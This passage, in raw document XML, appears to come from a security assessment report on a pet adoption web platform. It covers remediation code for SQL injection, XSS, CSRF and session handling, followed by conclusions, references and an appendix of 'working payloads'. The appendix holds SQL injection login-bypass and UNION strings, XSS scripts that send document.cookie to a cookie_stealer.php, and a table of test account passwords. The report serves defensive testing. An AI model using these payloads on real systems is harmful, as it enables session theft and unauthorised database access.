          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use prepared statements: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162DB5" w14:paraId="6ADE46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4F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9CDF95A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>$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stmt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 $conn-&gt;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prepare(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"SELECT * FROM users WHERE email = ? AND password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= ?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");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DE3F0EC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>$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stmt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-&gt;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bind_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param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"ss", $email, $password);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C9E780E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>$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stmt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-&gt;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execute(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);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4670A7B3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>$result = $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stmt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-&gt;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get_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result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);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C346FF8" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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>6.2 XSS Prevention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B8682B" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Always sanitize output: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162DB5" w14:paraId="61AB9C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4F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78102D3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// For display (use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htmlspecialchars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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B56443F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>&lt;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?php echo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htmlspecialchars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$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user_input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, ENT_QUOTES, 'UTF-8'); ?&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17851ECC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68FB3FE3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// For display (use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strip_tags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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09CEE81F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&lt;?php echo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strip_tags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($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user_input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; ?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&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F8D2C7C" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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>6.3 CSRF Prevention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F03B28" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Add CSRF tokens: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162DB5" w14:paraId="31349E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4F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C1A4A84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>// Generate token</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77A993C0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>$_SESSION['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csrf_token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'] = bin2hex(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random_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bytes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32));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F9618DF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7C45010B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>// Add to form</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E46019F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>&lt;input type="hidden" name="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csrf_token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" value="&lt;?php echo $_SESSION['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csrf_token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']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; ?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&gt;"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EB93010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0175C709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>// Verify token</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E6142FE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>if ($_POST['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csrf_token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'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] !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== $_SESSION['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csrf_token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']) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1453CFE3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die(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"CSRF attack dete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cted!");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E5AECA0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</w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4AAA3FC0" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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>6.4 Secure Session Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005C76AE" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Implement session security: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162DB5" w14:paraId="0A6052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4F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641A116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>// Regenerate session ID after login</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4ECDCBD1" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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session_regenerate_id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(true);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4810FEB2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4F07D079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>// Set session timeout</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79D59BAD" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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ini_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set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session.gc_maxlifetime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', 3600);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12C2475E" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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session_set_cookie_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params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3600);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42389D04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10EC8151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>// Secure session cookies</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C29B240" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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ini_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set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session.cookie_httponly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', 1);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46A8396F" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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ini_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set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session.cookie_secure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', 1); // Only with HTTPS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EB03EA7" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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ini_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set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session.cookie_samesite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', 'Strict');</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C4F9D2C" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="054D65EC" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="1F4E79"/>
        </w:pBdr>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>7. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054BC669" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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>7.1 Key Takeaways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47075C0C" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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SQL Injection is the most critical vulnerability found, allowing complete database access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00631127" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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XSS can lead to complete account takeover through cookie theft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7395C202" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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CSRF allows unauthorized actions to be performed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5340B373" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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All vulnerabilities are preventable with proper coding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74311A37" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Cookie stealing demonstrates the importance of secure session management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC7AF36" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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>7.2 Final Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79996E93" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The Pet Adoption Platform requires significant security improvements before production deployment. The vulnerabilities identified pose serious risk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>s including data breach, unauthorized access, account takeover, and data manipulation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E33F3F1" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Recommended actions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2225CF" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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1. Implement prepared statements for all database queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B117E6C" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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2. Sanitize all user input and output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392BB167" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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3. Add CSRF protection tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4190C9" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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4. Implement proper session management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5C5D17" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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5. Use password hashing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246C0EAE" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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6. Enable HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607BDC16" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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7. Regular security audits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB71EA6" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="1F4E79"/>
        </w:pBdr>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>8. References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1F73F0" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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>8.1 Security Standards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AF896B" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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OWASP Top 10 (2021)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74378F6E" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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CWE/SANS Top 25 Most Dangerous Software Errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12866CB2" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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>8.2 Documentatio</w:t>
      </w:r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>n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A049459" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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PHP Security Best Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBBF034" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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MariaDB Security Guide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FAB483" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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>8.3 Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEBD337" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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CWE-89: SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E12C5B7" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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CWE-79: Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2137C424" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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CWE-352: Cross-Site Request Forgery (CSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736C5791" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E684240" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="1F4E79"/>
        </w:pBdr>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Appendix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C24C5F" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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>A. Working Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F8980D" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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A.1 SQL Injection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162DB5" w14:paraId="5EDF82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4F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3EE05C2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>-- Login Bypass</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D5FD7EA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>' OR '1'='1'#</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10EB1031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>' OR 1=1#</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24D8D5BC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>admin@petadoption.com' --</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D8C4E09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7A9A86B5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>-- Union Injection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="152ECCFC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>' UNION SELECT id, username, email, password, role FROM users --</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F7AA382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' UNION SELECT 1,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database(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), user(), version(), 5 --</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F9A6A88" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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A.2 XSS Payloads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162DB5" w14:paraId="0D19C6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4F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1F5B754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>&lt;script&gt;alert(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1)&lt;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/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A86D5C6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>&lt;script&gt;alert(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document.cookie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)&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51C3F8FA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>&lt;script&gt;fetch("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http://localhost/cookie_stealer.php?cookie="+document.cookie)&lt;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/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="663365CF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>&lt;script&gt;new Image().src="http://localhost/cookie_stealer.php?c="+document.cookie&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CD5B1FB" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas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img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=x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onerror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="alert('XSS')"&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="30E96732" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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>B. Test Credentials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200"/>
        <w:gridCol w:w="2150"/>
        <w:gridCol w:w="2000"/>
      </w:tblGrid>
      <w:tr w:rsidR="00162DB5" w14:paraId="50A512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28C7A7" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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800705" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="215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9A0AE2" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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A03F31" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00162DB5" w14:paraId="70D4A9A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BF6D21" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>admin</w:t>
            </w:r>
          </w:p>
        </w:tc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CA6CEC" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>admin@petadoption.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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C15CB9" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>admin123</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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0EE784" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00162DB5" w14:paraId="0B9850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7CC7A1" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>john_doe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/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03373E" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>john@email.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2150" w:type="dxa"/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6B1181" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>password123</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/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8B3C62" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>user</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00162DB5" w14:paraId="0420500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468AE7" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>jane_smith</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc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4BB15C" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>jane@email.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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DFF08F" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>qwerty456</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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1C8B7F" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>user</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00162DB5" w14:paraId="703243A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AB85B8" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>pet_lover</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/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35C7DF" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>petlover@email.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2150" w:type="dxa"/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41A2A8" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>lovepets789</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/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09EF68" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>user</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="535ADD9F" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="00162DB5">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FF5092E" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="00162DB5">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="0" w:color="BFBFBF"/>
        </w:pBdr>
        <w:spacing w:before="400"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="029A3BF0" w14:textId="17637C8D" w:rsidR="00162DB5" w:rsidRDefault="00162DB5">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00162DB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EB8147D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5798F07C"/>
    <w:lvl w:ilvl="0" w:tplc="5450FA46">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="260"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="FDE26534">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="E6F4C5AA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="B7CA4540">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="05CE01FA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="533CBA22">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="1F6242C2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="64E056B2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="4050AB72">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="78BA46D7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F88A8A02"/>
    <w:lvl w:ilvl="0" w:tplc="1306330A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="5978B358">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="C51C41B2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="DF1267B6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="19763956">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
